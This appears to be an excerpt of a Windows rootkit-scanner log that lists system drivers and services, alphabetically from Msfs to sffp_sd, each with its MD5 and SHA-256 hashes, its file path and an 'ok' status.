19:28:46.0982 0x0744  [ DAEFB28E3AF5A76ABCC2C3078C07327F, 6EB558532400B489763BAE7203538DE5F196282A8CB46A1B31D59120FC5AFCEF ] Msfs            C:\Windows\system32\drivers\Msfs.sys
19:28:46.0984 0x0744  Msfs - ok
19:28:46.0990 0x0744  [ 3E1E5767043C5AF9367F0056295E9F84, B2EDFECD3C14E4FE1BA87D9A86334043A9BD696A554EBD186DA7EAEB2EBD4F70 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
19:28:46.0991 0x0744  mshidkmdf - ok
19:28:46.0997 0x0744  [ 0A4E5757AE09FA9622E3158CC1AEF114, ED574E420E57374E328C7C526504ECA569C164287966F06019EC207CB17F2C54 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
19:28:46.0998 0x0744  msisadrv - ok
19:28:47.0035 0x0744  [ 90F7D9E6B6F27E1A707D4A297F077828, BEFC220EAA7307849600748842ACB9254A6A91158812D9B23EFAF912C498BA7F ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
19:28:47.0048 0x0744  MSiSCSI - ok
19:28:47.0057 0x0744  msiserver - ok
19:28:47.0086 0x0744  [ 8C0860D6366AAFFB6C5BB9DF9448E631, 949C5A14E57F2D7385543C17C3485E7ADE36EA2016F6E0A1866571D2EDE90A77 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
19:28:47.0088 0x0744  MSKSSRV - ok
19:28:47.0109 0x0744  [ 3EA8B949F963562CEDBB549EAC0C11CE, 1B0B2F16A1790282504F3C548D47C3281EFB440D5D9711A1EF76D6371B768D2D ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
19:28:47.0111 0x0744  MSPCLOCK - ok
19:28:47.0117 0x0744  [ F456E973590D663B1073E9C463B40932, 48BA6D5580EE7B6A4C06E04772FD35B51779553FC0DD6C5C30DD8B5DEEB25B11 ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
19:28:47.0118 0x0744  MSPQM - ok
19:28:47.0135 0x0744  [ 0E008FC4819D238C51D7C93E7B41E560, 141FCEBDD05874407EAEC35A9DCD3BB16F2A428F23E55487D6A5DBFCADBF10D2 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
19:28:47.0140 0x0744  MsRPC - ok
19:28:47.0147 0x0744  [ FC6B9FF600CC585EA38B12589BD4E246, F05DB01AE1955D2468CE6B51E51998B111CA3B0BDEED090EE6B99B625CBA564A ] mssmbios        C:\Windows\system32\DRIVERS\mssmbios.sys
19:28:47.0149 0x0744  mssmbios - ok
19:28:47.0154 0x0744  [ B42C6B921F61A6E55159B8BE6CD54A36, 6BB0A7BE005B8F281E551D1B8046CE4202372BC7AE0161881C858BFAC675FE1C ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
19:28:47.0156 0x0744  MSTEE - ok
19:28:47.0160 0x0744  [ 33599130F44E1F34631CEA241DE8AC84, E15B31D1AFDC8DC6D2B21D4215796A99ECC69EEDBB06CEED01AECC3C99A44C8B ] MTConfig        C:\Windows\system32\drivers\MTConfig.sys
19:28:47.0162 0x0744  MTConfig - ok
19:28:47.0169 0x0744  [ 159FAD02F64E6381758C990F753BCC80, E55AB01DCFA95ECAB24A2A9656E28FF9D064BA08B3D82DC8AA42F5991BA09598 ] Mup             C:\Windows\system32\Drivers\mup.sys
19:28:47.0171 0x0744  Mup - ok
19:28:47.0205 0x0744  [ 61D57A5D7C6D9AFE10E77DAE6E1B445E, D252248532142E9E2332DA693BC51B795102CA938B568FF04981E98B19BFBC5C ] napagent        C:\Windows\system32\qagentRT.dll
19:28:47.0215 0x0744  napagent - ok
19:28:47.0268 0x0744  [ 26384429FCD85D83746F63E798AB1480, 957C115C263A4B4DC854558B43ECE632D8E2BCCB744E23A01EBA7476BA2E7FFB ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
19:28:47.0275 0x0744  NativeWifiP - ok
19:28:47.0300 0x0744  [ E7C54812A2AAF43316EB6930C1FFA108, C8A6FC1957FA29A3B372132FEA9145538BC767044A11D77316D3D1A3EAA60630 ] NDIS            C:\Windows\system32\drivers\ndis.sys
19:28:47.0383 0x0744  NDIS - ok
19:28:47.0431 0x0744  [ 0E1787AA6C9191D3D319E8BAFE86F80C, F535022747355B2C66424BDA892D7DCB820C2EB8EE05BAE5BC6D1B1D65186278 ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
19:28:47.0433 0x0744  NdisCap - ok
19:28:47.0454 0x0744  [ E4A8AEC125A2E43A9E32AFEEA7C9C888, 6EA181117126FC70B3C1DD1AC73CC26D1603A2CF49E47F66623E2C9489C49B55 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
19:28:47.0456 0x0744  NdisTapi - ok
19:28:47.0465 0x0744  [ D8A65DAFB3EB41CBB622745676FCD072, 874D3C3D247C4A309DA813DB1D2EDB0037D3C489824BD5FE95B0C20699764EF7 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
19:28:47.0467 0x0744  Ndisuio - ok
19:28:47.0474 0x0744  [ 38FBE267E7E6983311179230FACB1017, CFD1CBCA59650795C030DB30E5795B37C11C736E14003AE1DAB081BA5C0C9B14 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
19:28:47.0478 0x0744  NdisWan - ok
19:28:47.0483 0x0744  [ A4BDC541E69674FBFF1A8FF00BE913F2, 18CCFD063E9870B8B6958715BC0414C4D920AE63528EA1E9D7E30F7138918FFA ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
19:28:47.0485 0x0744  NDProxy - ok
19:28:47.0490 0x0744  [ 80B275B1CE3B0E79909DB7B39AF74D51, 75B406B0D9D28239D4EB2A298419A5F78A58237D88C5FD688EF1DFFAFACCF796 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
19:28:47.0492 0x0744  NetBIOS - ok
19:28:47.0537 0x0744  [ 280122DDCF04B378EDD1AD54D71C1E54, F98B2ADE34F7E67C7C06C1D0FFB80ECBC353D044D4B4784CD952910345DC2ED0 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
19:28:47.0549 0x0744  NetBT - ok
19:28:47.0573 0x0744  [ F42309C4191C506B71DB5D1126D26318, 29B0A8889857CEBFA6CBD795D5EECDDFFA04E794BD3C73FC488725B2A160F326 ] Netlogon        C:\Windows\system32\lsass.exe
19:28:47.0575 0x0744  Netlogon - ok
19:28:47.0631 0x0744  [ 7CCCFCA7510684768DA22092D1FA4DB2, BB9E4F8FABBF596D888E6D303CB54A336D9DFF95B36AEA9369D2ED787DDC4B5D ] Netman          C:\Windows\System32\netman.dll
19:28:47.0640 0x0744  Netman - ok
19:28:47.0663 0x0744  [ 8C338238C16777A802D6A9211EB2BA50, 0D08A47CD403EDA5E8CAD7409BBBBCDC29A9861D2DC41D42B68B22B1AA1EBDD6 ] netprofm        C:\Windows\System32\netprofm.dll
19:28:47.0674 0x0744  netprofm - ok
19:28:47.0707 0x0744  [ F476EC40033CDB91EFBE73EB99B8362D, B17535037BC070F9AE1F6B381C2DBEE27658A8FDE15FB0E061F485EA7C7CBE59 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
19:28:47.0712 0x0744  NetTcpPortSharing - ok
19:28:47.0896 0x0744  [ 58218EC6B61B1169CF54AAB0D00F5FE2, B76ABB2AD78CE68D30F0F08563B0593D658298CDCF1B138B6E9FB0D64CBCC3C2 ] netw5v32        C:\Windows\system32\DRIVERS\netw5v32.sys
19:28:48.0062 0x0744  netw5v32 - ok
19:28:48.0121 0x0744  [ 1D85C4B390B0EE09C7A46B91EFB2C097, 6A8850B151E88EE371F3CC543A946302DDF9494908D684B8B0C706A42CC54348 ] nfrd960         C:\Windows\system32\drivers\nfrd960.sys
19:28:48.0126 0x0744  nfrd960 - ok
19:28:48.0163 0x0744  [ 912084381D30D8B89EC4E293053F4710, 99B8CD043DF531D4B9725ED167F63CED220608B2FED3EE8250C217D15762DFD7 ] NlaSvc          C:\Windows\System32\nlasvc.dll
19:28:48.0174 0x0744  NlaSvc - ok
19:28:48.0182 0x0744  [ 1DB262A9F8C087E8153D89BEF3D2235F, A51EE5D5AD3CD76B74BEA9C66C462608BF3B50C53DAA4110A75DB10495A8C101 ] Npfs            C:\Windows\system32\drivers\Npfs.sys
19:28:48.0185 0x0744  Npfs - ok
19:28:48.0200 0x0744  [ BA387E955E890C8A88306D9B8D06BF17, 3477BD9686C5777A93251C154512671AAA7533B18C536DF51F7B1D6D28E7F8A5 ] nsi             C:\Windows\system32\nsisvc.dll
19:28:48.0203 0x0744  nsi - ok
19:28:48.0214 0x0744  [ E9A0A4D07E53D8FEA2BB8387A3293C58, 690CAD6C4E35ECC1172A2E1FD3933DF73158B3BF42CB21244269612A53DE4D7A ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
19:28:48.0215 0x0744  nsiproxy - ok
19:28:48.0274 0x0744  [ 33C3093D09017CFE2E219F2472BFF6EB, DE46C7A53C3606F036DED1EE8A81B79CAF3171A7E97DA2F71712E2DA046A262E ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
19:28:48.0303 0x0744  Ntfs - ok
19:28:48.0320 0x0744  [ F9756A98D69098DCA8945D62858A812C, 572ADBFCFDE2030B34A013AADC14DBC144EB3F34D06991E2464A3EA9605BC045 ] Null            C:\Windows\system32\drivers\Null.sys
19:28:48.0322 0x0744  Null - ok
19:28:48.0357 0x0744  [ AF2EEC9580C1D32FB7EAF105D9784061, 6DAAE3BCA048ACD7FFD26A65C793C461933179070F03855FE3DC3C01F968163A ] nvraid          C:\Windows\system32\drivers\nvraid.sys
19:28:48.0363 0x0744  nvraid - ok
19:28:48.0370 0x0744  [ 9283C58EBAA2618F93482EB5DABCEC82, 0BC119D4EAFDEA879E4C1CFBA5402499DBD1970EDF963C6D2034D4867C34D15E ] nvstor          C:\Windows\system32\drivers\nvstor.sys
19:28:48.0375 0x0744  nvstor - ok
19:28:48.0395 0x0744  [ 5A0983915F02BAE73267CC2A041F717D, D83461D74597BF2BE042FEFCC27FCD18BF63CB8135B0666D731D50951C3468A8 ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
19:28:48.0399 0x0744  nv_agp - ok
19:28:48.0404 0x0744  [ 08A70A1F2CDDE9BB49B885CB817A66EB, 0BB98123B544124B144F3E95D77E01E973D060B8B2302503FF24ABBBE803EB63 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
19:28:48.0407 0x0744  ohci1394 - ok
19:28:48.0443 0x0744  [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
19:28:48.0453 0x0744  p2pimsvc - ok
19:28:48.0470 0x0744  [ 59C3DDD501E39E006DAC31BF55150D91, E02B63AB7F34CF6FF3F644AF354D10004E6F50014E03172D80BD78934EF71EF1 ] p2psvc          C:\Windows\system32\p2psvc.dll
19:28:48.0481 0x0744  p2psvc - ok
19:28:48.0487 0x0744  [ 2EA877ED5DD9713C5AC74E8EA7348D14, 14BA3722CE5F8FF07F2D97DCDD6558EB49C9B02E5E6FAD6D9F18D354733EFECE ] Parport         C:\Windows\system32\DRIVERS\parport.sys
19:28:48.0490 0x0744  Parport - ok
19:28:48.0495 0x0744  [ BF8F6AF06DA75B336F07E23AEF97D93B, 2F2C4314872732550A112BFF2F803484D4A3D697F0D69D352350CE208FD8A1A4 ] partmgr         C:\Windows\system32\drivers\partmgr.sys
19:28:48.0497 0x0744  partmgr - ok
19:28:48.0504 0x0744  [ EB0A59F29C19B86479D36B35983DAADC, AC09AFE7F13BE4079D01383BAC44091997E1AAF6512C9673A42B9E3780EB08A8 ] Parvdm          C:\Windows\system32\DRIVERS\parvdm.sys
19:28:48.0505 0x0744  Parvdm - ok
19:28:48.0513 0x0744  [ 358AB7956D3160000726574083DFC8A6, 6CAFD4D1B8AB8C1D167ADC018985DDAB5AC2CBFFB3434FE6390F14AF50C19025 ] PcaSvc          C:\Windows\System32\pcasvc.dll
19:28:48.0519 0x0744  PcaSvc - ok
19:28:48.0541 0x0744  [ 673E55C3498EB970088E812EA820AA8F, 1F81315664B8CBFDD569416C0ECCE4C6251F34577313A0858AB46609781303B5 ] pci             C:\Windows\system32\drivers\pci.sys
19:28:48.0545 0x0744  pci - ok
19:28:48.0550 0x0744  [ AFE86F419014DB4E5593F69FFE26CE0A, CAF36E61BE7B511D3A03A65FF5A3017CEE4D2F53005B410F2D4A2AAE9FED4C00 ] pciide          C:\Windows\system32\drivers\pciide.sys
19:28:48.0551 0x0744  pciide - ok
19:28:48.0560 0x0744  [ F396431B31693E71E8A80687EF523506, BC614FC21E029E2497F1CCE3131BBD295B827F2310762B47D5BBC7703D80554B ] pcmcia          C:\Windows\system32\DRIVERS\pcmcia.sys
19:28:48.0565 0x0744  pcmcia - ok
19:28:48.0570 0x0744  [ 250F6B43D2B613172035C6747AEEB19F, A91F15B133F2619912CF750E6F3662E011CD0FA4B9477CE532CE3196D23307D9 ] pcw             C:\Windows\system32\drivers\pcw.sys
19:28:48.0572 0x0744  pcw - ok
19:28:48.0591 0x0744  [ 9E0104BA49F4E6973749A02BF41344ED, B32F39F38DB48D77FBA884DEE34112BAB81CCEF5DD2EAAA12D9589D73D2BB116 ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
19:28:48.0607 0x0744  PEAUTH - ok
19:28:48.0663 0x0744  [ AF4D64D2A57B9772CF3801950B8058A6, C9C493A3775E6E1660CE5DF75DA574D0C04245FB88CF41B96217A725359C350D ] PeerDistSvc     C:\Windows\system32\peerdistsvc.dll
19:28:48.0689 0x0744  PeerDistSvc - ok
19:28:48.0786 0x0744  [ 414BBA67A3DED1D28437EB66AEB8A720, D6DF254E2615FA402044824DCD9004F579FC0DF74B90E44C99D5F0253CF8AD88 ] pla             C:\Windows\system32\pla.dll
19:28:48.0836 0x0744  pla - ok
19:28:48.0906 0x0744  [ 92DC6E68D2C856C5C2F21AE9E22112B8, EFAA27886A05E57E629A9EFC3671D9D64144795EDF55438A676F5B43E59BE3FC ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
19:28:48.0924 0x0744  PlugPlay - ok
19:28:48.0946 0x0744  [ 63FF8572611249931EB16BB8EED6AFC8, 9732CCBCB93A7A4BEC88812B952C20244479E9BD781240C195E57F09E619EA33 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
19:28:48.0950 0x0744  PNRPAutoReg - ok
19:28:48.0965 0x0744  [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
19:28:48.0972 0x0744  PNRPsvc - ok
19:28:49.0021 0x0744  [ 53946B69BA0836BD95B03759530C81EC, 7F14A34635354CCA0F5342C8D9DF5A6AA1B94F6A508BD8834029E9BACF252920 ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
19:28:49.0042 0x0744  PolicyAgent - ok
19:28:49.0053 0x0744  [ F87D30E72E03D579A5199CCB3831D6EA, B09328E89954584F97908FA5946376BA990B8C650DABCBF3CA3B08719937C694 ] Power           C:\Windows\system32\umpo.dll
19:28:49.0059 0x0744  Power - ok
19:28:49.0095 0x0744  [ 631E3E205AD6D86F2AED6A4A8E69F2DB, 1D3BF0CFC37D91A3A56246920B9CF1084E78A055D56E85A773417809C58C8065 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
19:28:49.0098 0x0744  PptpMiniport - ok
19:28:49.0106 0x0744  [ 85B1E3A0C7585BC4AAE6899EC6FCF011, 1E067113C146D6842D7FB04007F363D6FB7783C6BC7C9AB6614E44075C4F86C3 ] Processor       C:\Windows\system32\drivers\processr.sys
19:28:49.0108 0x0744  Processor - ok
19:28:49.0169 0x0744  [ 43CA4CCC22D52FB58E8988F0198851D0, DF67BD70D9D82677AE61244B4E54677A5008A7F5EB531DF2A7E7D33F1658EA78 ] ProfSvc         C:\Windows\system32\profsvc.dll
19:28:49.0186 0x0744  ProfSvc - ok
19:28:49.0202 0x0744  [ F42309C4191C506B71DB5D1126D26318, 29B0A8889857CEBFA6CBD795D5EECDDFFA04E794BD3C73FC488725B2A160F326 ] ProtectedStorage C:\Windows\system32\lsass.exe
19:28:49.0204 0x0744  ProtectedStorage - ok
19:28:49.0244 0x0744  [ 6270CCAE2A86DE6D146529FE55B3246A, 463209CBAF1B0E269DC8FC6FBDEE5BB7E5ADB5D3F024930BFD0B97E0A9678883 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
19:28:49.0247 0x0744  Psched - ok
19:28:49.0299 0x0744  [ AB95ECF1F6659A60DDC166D8315B0751, 0ED6D3460D28978BADF31B930DBB3298A6A10EFF8883763EABA0E36A21A0E83D ] ql2300          C:\Windows\system32\drivers\ql2300.sys
19:28:49.0385 0x0744  ql2300 - ok
19:28:49.0432 0x0744  [ B4DD51DD25182244B86737DC51AF2270, 7E62B04F054A6330B7F9968222523BDE8F3EE47A11D17E6C0E2D5ACDC07B9E6B ] ql40xx          C:\Windows\system32\drivers\ql40xx.sys
19:28:49.0441 0x0744  ql40xx - ok
19:28:49.0487 0x0744  [ 31AC809E7707EB580B2BDB760390765A, A8481FD19A0F778F5591B7676F591F664ADC68B6867E663C0F9564173F4AC909 ] QWAVE           C:\Windows\system32\qwave.dll
19:28:49.0498 0x0744  QWAVE - ok
19:28:49.0504 0x0744  [ 584078CA1B95CA72DF2A27C336F9719D, 836F115C92D343463C14A9DE39648C1EFA7C7EE4720F5C692EE0F68B84830121 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
19:28:49.0507 0x0744  QWAVEdrv - ok
19:28:49.0514 0x0744  [ 30A81B53C766D0133BB86D234E5556AB, 726C6B83B5ACAA84CAB1689B6DD6DDAE3199D61A57B5D7B5B5A0F62FCF838090 ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
19:28:49.0516 0x0744  RasAcd - ok
19:28:49.0541 0x0744  [ 57EC4AEF73660166074D8F7F31C0D4FD, C66B425EC4DB5E7FD289AE631C9B019EB16717C55E80FAE964BB22203E4AACEF ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
19:28:49.0543 0x0744  RasAgileVpn - ok
19:28:49.0557 0x0744  [ A60F1839849C0C00739787FD5EC03F13, B210DFA5A843CF1DA73635F168E2EA5052CBED15C664F8523CDFB34CA165D0E0 ] RasAuto         C:\Windows\System32\rasauto.dll
19:28:49.0562 0x0744  RasAuto - ok
19:28:49.0569 0x0744  [ D9F91EAFEC2815365CBE6D167E4E332A, 8350457A39D141C13807E7DB5A8D4113197C4016F7744B9993391F4AEA0C4A5C ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
19:28:49.0572 0x0744  Rasl2tp - ok
19:28:49.0609 0x0744  [ CB9E04DC05EACF5B9A36CA276D475006, 4D8C0AEF1D4F84F375AD2BAF786C9F6C52316A3E655B913449E71AD7C0FCA56E ] RasMan          C:\Windows\System32\rasmans.dll
19:28:49.0619 0x0744  RasMan - ok
19:28:49.0644 0x0744  [ 0FE8B15916307A6AC12BFB6A63E45507, 64119474DE7499E6E8B82E78BBD50074B3AA70B3E8329089FAE9B7F29919004E ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
19:28:49.0647 0x0744  RasPppoe - ok
19:28:49.0656 0x0744  [ 44101F495A83EA6401D886E7FD70096B, 56A0CE5C89870752B9B2AB795C1A248CA28209E049B2F20CCA0308CBE2488A0A ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
19:28:49.0659 0x0744  RasSstp - ok
19:28:49.0700 0x0744  [ D528BC58A489409BA40334EBF96A311B, C71E9A4B101DB6C3183B9F97B9098D73D6FE1B12C05C2EB3CE8A8041BEE6BA61 ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
19:28:49.0709 0x0744  rdbss - ok
19:28:49.0715 0x0744  [ 0D8F05481CB76E70E1DA06EE9F0DA9DF, 2AFCBE3237D27AFBF095F91F1FCCA63E6890F34A9E4F00E5C34C92394CDA89FB ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
19:28:49.0716 0x0744  rdpbus - ok
19:28:49.0722 0x0744  [ 23DAE03F29D253AE74C44F99E515F9A1, 8FED93D10B2062F0526FE3508101F8FCF8F72DEB90AFB472EB7CBAE83A0EC430 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
19:28:49.0723 0x0744  RDPCDD - ok
19:28:49.0759 0x0744  [ B973FCFC50DC1434E1970A146F7E3885, BE797E5F5AE34D37F8DA1134CE94DD14DBE36D2BC405B97E992E2257848B7CA9 ] RDPDR           C:\Windows\system32\drivers\rdpdr.sys
19:28:49.0769 0x0744  RDPDR - ok
19:28:49.0792 0x0744  [ 5A53CA1598DD4156D44196D200C94B8A, 8112FE14FEC94C67B1C5BDE4171E37584F1D0098D2C557C9E4BDD3E0291E25E4 ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
19:28:49.0794 0x0744  RDPENCDD - ok
19:28:49.0802 0x0744  [ 44B0A53CD4F27D50ED461DAE0C0B4E1F, CDA80B08E67AD034081C0C920CD66147689F1844403CBC552F65005E7C011A91 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
19:28:49.0804 0x0744  RDPREFMP - ok
19:28:49.0840 0x0744  [ 68A0387F58E226DEEE23D9715955572A, F95BB1D2BB3E79AF47B1C715BB5E3003EEF888AAA963F46F4A2FE8AFBD4F37A4 ] RdpVideoMiniport C:\Windows\system32\drivers\rdpvideominiport.sys
19:28:49.0842 0x0744  RdpVideoMiniport - ok
19:28:49.0851 0x0744  [ 288B06960D78428FF89E811632684E20, 82FB13C2749637E172381C9C205080921A45453191B6246C5D3FE946A06D17F5 ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
19:28:49.0856 0x0744  RDPWD - ok
19:28:49.0899 0x0744  [ 518395321DC96FE2C9F0E96AC743B656, 5F6A0880B4F3EE7196259EA362DA9554B0687B0236F9A8E5CF7A4A77F01F1776 ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
19:28:49.0904 0x0744  rdyboost - ok
19:28:49.0936 0x0744  [ 7B5E1419717FAC363A31CC302895217A, 048B96B127CC20833948DAE53C59886D5C725ECA7A744424A01339447D2DDC32 ] RemoteAccess    C:\Windows\System32\mprdim.dll
19:28:49.0941 0x0744  RemoteAccess - ok
19:28:49.0968 0x0744  [ CB9A8683F4EF2BF99E123D79950D7935, B9FA3E7E91E76D975CF40BFA37909E50F29CC13AB1399007884710651827E9AA ] RemoteRegistry  C:\Windows\system32\regsvc.dll
19:28:49.0973 0x0744  RemoteRegistry - ok
19:28:49.0990 0x0744  [ CB928D9E6DAF51879DD6BA8D02F01321, DFD263B67DDF98AE09AF6D6986CBC7BE3206BCE8403AAC51BCF9459E78233D12 ] RFCOMM          C:\Windows\system32\DRIVERS\rfcomm.sys
19:28:49.0994 0x0744  RFCOMM - ok
19:28:50.0025 0x0744  [ 78D072F35BC45D9E4E1B61895C152234, 80C924EE1156B4E3172E83DCB9C60817E87885FB9377647E0BF90153E415B1CA ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
19:28:50.0029 0x0744  RpcEptMapper - ok
19:28:50.0058 0x0744  [ 94D36C0E44677DD26981D2BFEEF2A29D, D77A93AC60536F3706E8A0154C0C2199E888B7748C84DB7437254FF175F4DF55 ] RpcLocator      C:\Windows\system32\locator.exe
19:28:50.0060 0x0744  RpcLocator - ok
19:28:50.0084 0x0744  [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] RpcSs           C:\Windows\system32\rpcss.dll
19:28:50.0093 0x0744  RpcSs - ok
19:28:50.0144 0x0744  [ 032B0D36AD92B582D869879F5AF5B928, 0F8F18A6A0A689957B886D9368015889091094EDA18BE532093F06A70A7CE184 ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
19:28:50.0147 0x0744  rspndr - ok
19:28:50.0181 0x0744  [ 7FA7F2E249A5DCBB7970630E15E1F482, 9633B193F3FDA67BC551C6DCA4788AB83E9F45F77763EE579D02FE5D6B80DEDF ] s3cap           C:\Windows\system32\drivers\vms3cap.sys
19:28:50.0183 0x0744  s3cap - ok
19:28:50.0200 0x0744  [ F42309C4191C506B71DB5D1126D26318, 29B0A8889857CEBFA6CBD795D5EECDDFFA04E794BD3C73FC488725B2A160F326 ] SamSs           C:\Windows\system32\lsass.exe
19:28:50.0203 0x0744  SamSs - ok
19:28:50.0224 0x0744  [ 05D860DA1040F111503AC416CCEF2BCA, DAE2F37D09A5A42F945BC8E27E4EA2303521081783A80CEE7FEE7C5A1C2CFC5E ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
19:28:50.0227 0x0744  sbp2port - ok
19:28:50.0260 0x0744  [ 8FC518FFE9519C2631D37515A68009C4, 21E10585470CF9FC3BD1977F8A426686CD2FA6BD2094B9E3594B21C7C4541D25 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
19:28:50.0266 0x0744  SCardSvr - ok
19:28:50.0274 0x0744  [ 0693B5EC673E34DC147E195779A4DCF6, AF1B56FBF3ADABF94CD9DBA67586B8746DE135151F6B3D1B0EE315BC1E2DB670 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
19:28:50.0276 0x0744  scfilter - ok
19:28:50.0307 0x0744  [ A04BB13F8A72F8B6E8B4071723E4E336, E63287FF71C39CBF64C3347C455324C8437F9CF398153E269543588B65389502 ] Schedule        C:\Windows\system32\schedsvc.dll
19:28:50.0327 0x0744  Schedule - ok
19:28:50.0349 0x0744  [ 319C6B309773D063541D01DF8AC6F55F, 182F392FE839499D159A30A3CD04B5D0C87219930BFB1A7456880B7DA75B9820 ] SCPolicySvc     C:\Windows\System32\certprop.dll
19:28:50.0351 0x0744  SCPolicySvc - ok
19:28:50.0389 0x0744  [ 0328BE1C7F1CBA23848179F8762E391C, EA80853F04BAE6F46F658B3EFED34BFDDE20E6F2BDA349EBC17EC75DFF19855D ] sdbus           C:\Windows\system32\DRIVERS\sdbus.sys
19:28:50.0395 0x0744  sdbus - ok
19:28:50.0422 0x0744  [ 08236C4BCE5EDD0A0318A438AF28E0F7, 77727F963F63C4CEC11E7AAD5FB3836179701D512CA9436C3170B9E6A4E5F888 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
19:28:50.0430 0x0744  SDRSVC - ok
19:28:50.0470 0x0744  [ 90A3935D05B494A5A39D37E71F09A677, F72733A69BC6E1A2BB91D7632FF3463C12563F60FDCC00A2CDD67FF20D479952 ] secdrv          C:\Windows\system32\drivers\secdrv.sys
19:28:50.0472 0x0744  secdrv - ok
19:28:50.0489 0x0744  [ A59B3A4442C52060CC7A85293AA3546F, 1776D6DEE51991149265AAF39E17065E301C5FA1FF4068653DC0010B9B27185D ] seclogon        C:\Windows\system32\seclogon.dll
19:28:50.0532 0x0744  seclogon - ok
19:28:50.0561 0x0744  [ DCB7FCDCC97F87360F75D77425B81737, F8289AF2C458C167038EEFE613EE5E3D6D5B3308B8784168374BC81C47891CE5 ] SENS            C:\Windows\System32\sens.dll
19:28:50.0567 0x0744  SENS - ok
19:28:50.0602 0x0744  [ 50087FE1EE447009C9CC2997B90DE53F, B5E6CF1D991F87C29C5E28198E0962E31FFB499A46C3BD43FC20391693389959 ] SensrSvc        C:\Windows\system32\sensrsvc.dll
19:28:50.0607 0x0744  SensrSvc - ok
19:28:50.0614 0x0744  [ 9AD8B8B515E3DF6ACD4212EF465DE2D1, E2F019BCD1446236D078D46065DD151DD068778F33BE2F1E8A0CC1EA2F954E86 ] Serenum         C:\Windows\system32\drivers\serenum.sys
19:28:50.0616 0x0744  Serenum - ok
19:28:50.0639 0x0744  [ 5FB7FCEA0490D821F26F39CC5EA3D1E2, A26DB2EB9F3E2509B4EBA949DB97595CC32332D9321DF68283BFC102E66D766F ] Serial          C:\Windows\system32\drivers\serial.sys
19:28:50.0642 0x0744  Serial - ok
19:28:50.0647 0x0744  [ 79BFFB520327FF916A582DFEA17AA813, 7A2A9D69BE02228591186A9F4453D4B5FD98837CA422C873C48040170E8BD18C ] sermouse        C:\Windows\system32\drivers\sermouse.sys
19:28:50.0649 0x0744  sermouse - ok
19:28:50.0671 0x0744  [ 4AE380F39A0032EAB7DD953030B26D28, C8F5F2DD59574E966FDF3057867BB959A554BAB6FD5DC6F1427094A6BC2B2809 ] SessionEnv      C:\Windows\system32\sessenv.dll
19:28:50.0677 0x0744  SessionEnv - ok
19:28:50.0681 0x0744  [ 9F976E1EB233DF46FCE808D9DEA3EB9C, 6A5C53F27F8BCA85CE206EE7D196176F67EC6FFA5D4830373A20792C149B5E75 ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
19:28:50.0683 0x0744  sffdisk - ok
19:28:50.0689 0x0744  [ 932A68EE27833CFD57C1639D375F2731, 11D6B98FBEEE2B9C7B06EF7091857BBD3B349077997D6261D66280668FD1B5C3 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
19:28:50.0691 0x0744  sffp_mmc - ok
19:28:50.0696 0x0744  [ 6D4CCAEDC018F1CF52866BBBAA235982, AAC41F5C97B3FE5A3DC0838457EB8CC9BB71FCA16D3EDBB67D603F0A9D46C131 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
19:28:50.0697 0x0744  sffp_sd - ok
